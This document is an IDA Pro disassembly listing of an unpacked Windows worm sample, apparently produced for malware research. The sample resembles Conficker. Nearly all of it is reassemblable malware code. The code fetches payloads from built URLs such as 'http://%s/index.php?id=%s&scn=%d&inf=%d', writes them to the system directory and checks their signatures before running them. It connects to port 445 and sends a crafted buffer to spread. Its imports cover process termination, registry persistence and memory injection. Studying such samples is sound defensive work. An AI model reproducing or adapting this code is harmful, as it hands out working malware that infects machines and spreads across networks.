;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 4216198EA3B10C4238F367D0EF11E761
; File Name : u:\work\4216198ea3b10c4238f367d0ef11e761_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31420000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31421000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31421000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31421004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31421008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3142100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_31422882+1D�r
dword_31421010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31421014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_31422882+4E�r ...
dword_31421018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3142101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31421020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31421024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_31421028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3142102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31421030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31421034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_31421038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h
dword_31421040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_31421044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31421048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_3142104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31421050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31421054 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31421058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3142105C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31421060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31421064 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31421068 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_31422B67+8F�r
dword_3142106C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_31421070 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_31421074 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_31422A9B+F�r
dword_31421078 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_3142107C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_314211A0+F6�r ...
dword_31421080 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_314221C4+57�r
dword_31421084 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_31421422+64�r ...
dword_31421088 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_31422A9B+40�r
dword_3142108C dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_31422A9B+1B�r
dword_31421090 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_31421094 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31421801+16C�r ...
dword_31421098 dd 7C80978Eh ; resolved to->KERNEL32.InterlockedExchangedword_3142109C dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_314210A0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_314210A4 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31421DF0+2C�r
dword_314210A8 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_314223B2+116�r
dword_314210AC dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_314210B0 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_3142292E+92�r
dword_314210B4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31422336�r
dword_314210B8 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_314210BC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_314210C0 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_31421F52+12�r
dword_314210C4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_314210C8 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_314210CC dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_314210D0 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_314221C4+66�r ...
dword_314210D4 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_314225C3+3F�r ...
dword_314210D8 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_314210DC dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_314210E0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_31422A9B+C3�r
dword_314210E4 dd 7C910331h, 0 ; resolved to->NTDLL.RtlGetLastWin32Errordword_314210EC dd 77C371BCh ; resolved to->MSVCRT.sranddword_314210F0 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_314210F4 dd 77C478A0h ; resolved to->MSVCRT.strlendword_314210F8 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_314210FC dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31421F73:loc_31421F84�r ...
; ---------------------------------------------------------------------------
loc_31421100: ; DATA XREF: UPX0:loc_31422CD0�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_31421104 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_3142207E:loc_314220AF�r ...
dword_31421108 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_31421422+AA�r
align 10h
dword_31421110 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31421114 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_31421118 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessIddword_3142111C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_314215C7+77�r ...
dd 0
dword_31421124 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_314215C7+9D�r
dword_31421128 dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_314215C7+89�r
dword_3142112C dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_31421130 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:314227A2�r
dword_31421134 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_314215C7+B0�r
dd 0
dword_3142113C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31421140 dd 71AB3E00h ; resolved to->WS2_32.binddword_31421144 dd 71AB88D3h ; resolved to->WS2_32.listendword_31421148 dd 71AC1028h ; resolved to->WS2_32.acceptdword_3142114C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31421150 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31421154 dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_31421158 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_314221C4+AC�r
dword_3142115C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_31422712+D�r
dword_31421160 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_314221C4+F0�r
dword_31421164 dd 71AB406Ah ; resolved to->WS2_32.connectdword_31421168 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_3142207E+67�r ...
dword_3142116C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_31421801+1D8�r ...
dword_31421170 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_3142207E+128�r
dword_31421174 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_3142207E+12F�r
align 10h
dword_31421180 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
dword_31421190 dd 0FFFFFFFFh, 0 dd offset nullsub_2
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314211A0 proc near ; CODE XREF: sub_31421422+16D�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31421128 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_314211CB
push 1
jmp loc_31421261
; ---------------------------------------------------------------------------
loc_314211CB: ; CODE XREF: sub_314211A0+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_3142108C ; GetSystemDirectoryA
mov edi, dword_31421088
lea eax, [ebp+var_110]
push offset dword_314241F8
push eax
call edi ; dword_31421088
lea eax, [ebp+var_110]
push 6
push eax
call dword_31421084 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_31421F73
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset dword_314241F0
push eax
call edi ; dword_31421088
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_31421080 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31421241
push 2
jmp short loc_31421261
; ---------------------------------------------------------------------------
loc_31421241: ; CODE XREF: sub_314211A0+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31421124 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_31421264
push [ebp+var_4]
call dword_3142107C ; CloseHandle
push 3
loc_31421261: ; CODE XREF: sub_314211A0+26�j
; sub_314211A0+9F�j
pop eax
jmp short loc_314212B5
; ---------------------------------------------------------------------------
loc_31421264: ; CODE XREF: sub_314211A0+B4�j
mov edi, 100000h
push edi
call sub_31422CA5
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31421134 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_31421078 ; WriteFile
push [ebp+var_4]
call dword_3142107C ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31421FA3
push ebx
call sub_31422CB9
add esp, 0Ch
xor eax, eax
loc_314212B5: ; CODE XREF: sub_314211A0+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_314211A0 endp
; =============== S U B R O U T I N E =======================================
sub_314212BA proc near ; CODE XREF: sub_31421422+F8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_314212D1: ; CODE XREF: sub_314212BA+56�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
sub dl, [esp+0Ch+arg_8]
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
sub dl, [esp+0Ch+arg_8]
add eax, 3
shl bl, 4
and bl, 0F0h
or dl, bl
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, 30h
jl short loc_314212D1
pop edi
pop esi
pop ebx
retn
sub_314212BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421316 proc near ; CODE XREF: sub_3142139B+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31421349
add ebx, 1Ah
loc_31421349: ; CODE XREF: sub_31421316+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31421108
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; dword_31421108
pop ecx
test eax, eax
pop ecx
jz short loc_31421373
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31421396
; ---------------------------------------------------------------------------
loc_31421373: ; CODE XREF: sub_31421316+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; dword_31421108
pop ecx
test eax, eax
pop ecx
jz short loc_31421393
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31421396
; ---------------------------------------------------------------------------
loc_31421393: ; CODE XREF: sub_31421316+68�j
mov al, [ebp+arg_0]
loc_31421396: ; CODE XREF: sub_31421316+5B�j
; sub_31421316+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31421316 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142139B proc near ; CODE XREF: sub_31421422+D6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_314213F8
mov edi, [ebp+arg_0]
push ebx
loc_314213B0: ; CODE XREF: sub_3142139B+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_31421316
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_314213DC
cmp bl, 7Ah
jg short loc_314213DC
movsx esi, bl
sub esi, 61h
loc_314213DC: ; CODE XREF: sub_3142139B+34�j
; sub_3142139B+39�j
cmp bl, 41h
jl short loc_314213EC
cmp bl, 5Ah
jg short loc_314213EC
movsx esi, bl
sub esi, 41h
loc_314213EC: ; CODE XREF: sub_3142139B+44�j
; sub_3142139B+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_314213B0
pop ebx
jmp short loc_314213FB
; ---------------------------------------------------------------------------
loc_314213F8: ; CODE XREF: sub_3142139B+F�j
mov edi, [ebp+arg_0]
loc_314213FB: ; CODE XREF: sub_3142139B+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_3142139B endp
; =============== S U B R O U T I N E =======================================
sub_31421402 proc near ; CODE XREF: sub_31421422+104�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_31421406: ; CODE XREF: sub_31421402+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_31421406
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_31421402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421422 proc near ; CODE XREF: sub_314215C7+BA�p
var_174 = dword ptr -174h
var_170 = byte ptr -170h
var_168 = byte ptr -168h
var_164 = byte ptr -164h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_11C = byte ptr -11Ch
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31421180
push offset loc_31422CD0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 164h
push ebx
push esi
push edi
mov [ebp+var_128], 1
and [ebp+var_4], 0
push offset aZer0 ; "zer0"
push [ebp+arg_0]
call dword_31421104 ; strstr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_130], edi
test edi, edi
jz loc_314215A8
add edi, 4
mov [ebp+var_130], edi
jz loc_314215A8
push edi
call dword_31421084 ; lstrlenA
mov [ebp+var_1C], eax
cmp eax, 50h
jle loc_314215A8
and byte ptr [edi+100h], 0
mov al, [edi]
mov [ebp+var_168], al
movsx ebx, al
sub ebx, 61h
mov [ebp+var_12C], ebx
js loc_314215A8
cmp ebx, 1Ah
jge loc_314215A8
inc edi
mov [ebp+var_130], edi
push 7Eh
push edi
call dword_31421108 ; strchr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_314215A8
mov al, [esi]
mov [ebp+var_170], al
and byte ptr [esi], 0
push ebx
push edi
lea eax, [ebp+var_11C]
push eax
call sub_3142139B
mov al, [ebp+var_170]
mov [esi], al
inc esi
mov [ebp+var_130], esi
xor edi, edi
push edi
lea eax, [ebp+var_164]
push eax
lea eax, [esi+1]
push eax
call sub_314212BA
lea eax, [ebp+var_164]
push eax
call sub_31421402
add esp, 1Ch
cmp [esi], al
jnz short loc_314215A8
push 44h
push offset dword_31424000
lea eax, [ebp+var_124]
push eax
call sub_3142172F
add esp, 0Ch
lea eax, [ebp+var_174]
push eax
push 30h
lea eax, [ebp+var_164]
push eax
lea eax, [ebp+var_11C]
push eax
call dword_31421084 ; lstrlenA
push eax
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_124]
push eax
call sub_3142179A
add esp, 18h
test eax, eax
jnz short loc_3142159B
cmp [ebp+var_174], edi
jz short loc_3142159B
lea eax, [ebp+var_11C]
push eax
call sub_314211A0
pop ecx
mov [ebp+var_128], edi
loc_3142159B: ; CODE XREF: sub_31421422+15C�j
; sub_31421422+164�j
lea eax, [ebp+var_124]
push eax
call sub_3142177E
pop ecx
loc_314215A8: ; CODE XREF: sub_31421422+4E�j
; sub_31421422+5D�j ...
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_128]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31421422 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314215C7 proc near ; CODE XREF: sub_314216A2+2A�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_31422CA5
pop ecx
mov esi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_31421090 ; GetLocaleInfoA
xor ebx, ebx
cmp byte ptr [ebp+arg_4], bl
jz short loc_3142162F
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_31424FEC
push dword_31425004
push offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"...
push eax
call dword_3142111C ; wsprintfA
add esp, 1Ch
jmp short loc_31421647
; ---------------------------------------------------------------------------
loc_3142162F: ; CODE XREF: sub_314215C7+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
loc_31421647: ; CODE XREF: sub_314215C7+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31421128 ; InternetOpenA
push ebx
mov edi, eax
push ebx
push ebx
lea eax, [ebp+var_84]
push ebx
push eax
push edi
call dword_31421124 ; InternetOpenUrlA
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 2000h
push esi
push ebx
call dword_31421134 ; InternetReadFile
push esi
mov [ebp+arg_4], eax
call sub_31421422
push esi
call sub_31422CB9
mov esi, dword_3142112C
pop ecx
pop ecx
push ebx
call esi ; dword_3142112C
push edi
call esi ; dword_3142112C
mov eax, [ebp+arg_4]
pop edi
pop esi
pop ebx
leave
retn
sub_314215C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_314216A2 proc near ; DATA XREF: sub_314223B2+15B�o
push ebx
mov ebx, dword_31421098
push esi
push edi
loc_314216AB: ; CODE XREF: sub_314216A2+88�j
xor esi, esi
mov edi, 46021h
loc_314216B2: ; CODE XREF: sub_314216A2+86�j
inc esi
inc esi
call sub_31422038
test eax, eax
jz short loc_314216FC
mov al, byte_31424080[esi+esi*4]
push eax
push off_31424081[esi+esi*4]
call sub_314215C7
or eax, edi
pop ecx
xor eax, 8064h
pop ecx
shl eax, 3
mov edi, eax
xor eax, 228h
test ax, 0FFFFh
jnz short loc_314216FC
push 0
push offset dword_31425004
call ebx ; dword_31421098
push 0
push offset dword_31424FEC
call ebx ; dword_31421098
loc_314216FC: ; CODE XREF: sub_314216A2+19�j
; sub_314216A2+46�j
call dword_314210FC ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_31422068
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_31421094 ; Sleep
cmp esi, 16h
jb short loc_314216B2
jmp loc_314216AB
sub_314216A2 endp
; =============== S U B R O U T I N E =======================================
sub_3142172F proc near ; CODE XREF: sub_31421422+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_31421034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; dword_31421034
test eax, eax
jnz short loc_3142175C
push 8
push 1
push edi
push edi
push ebx
call esi ; dword_31421034
test eax, eax
jnz short loc_3142175C
push 1
pop eax
jmp short loc_3142177A
; ---------------------------------------------------------------------------
loc_3142175C: ; CODE XREF: sub_3142172F+19�j
; sub_3142172F+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_31421038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_3142177A: ; CODE XREF: sub_3142172F+2B�j
pop edi
pop esi
pop ebx
retn
sub_3142172F endp
; =============== S U B R O U T I N E =======================================
sub_3142177E proc near ; CODE XREF: sub_31421422+180�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3142102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_31421030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_3142177E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142179A proc near ; CODE XREF: sub_31421422+152�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3142101C ; CryptCreateHash
test eax, eax
jnz short loc_314217C0
push 1
pop eax
jmp short loc_314217FD
; ---------------------------------------------------------------------------
loc_314217C0: ; CODE XREF: sub_3142179A+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31421020 ; CryptHashData
test eax, eax
jnz short loc_314217D9
push 2
pop edi
jmp short loc_314217F2
; ---------------------------------------------------------------------------
loc_314217D9: ; CODE XREF: sub_3142179A+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_31421024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_314217F2: ; CODE XREF: sub_3142179A+3D�j
push [ebp+arg_0]
call dword_31421028 ; CryptDestroyHash
mov eax, edi
loc_314217FD: ; CODE XREF: sub_3142179A+24�j
pop edi
pop esi
pop ebp
retn
sub_3142179A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421801 proc near ; CODE XREF: sub_3142255F+36�p
; sub_314225C3+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31422CF0
mov eax, dword_31424C84
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_31424C88
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_31421158 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31421D61
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_3142115C ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_3142109C ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_31424C78
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_31421874: ; CODE XREF: sub_31421801+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_31421874
push 60h
lea eax, [ebp+var_E4]
push offset dword_31424798
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31422CE2 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31422CDC ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31422CE2 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31422CD6 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31422CD6 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31421160 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31421164 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31421D57
mov esi, dword_31421094
mov edi, 0C8h
push edi
call esi ; dword_31421094
push ebx
mov ebx, dword_31421168
push 89h
push offset dword_31424580
push [ebp+var_4]
call ebx ; dword_31421168
push edi
call esi ; dword_31421094
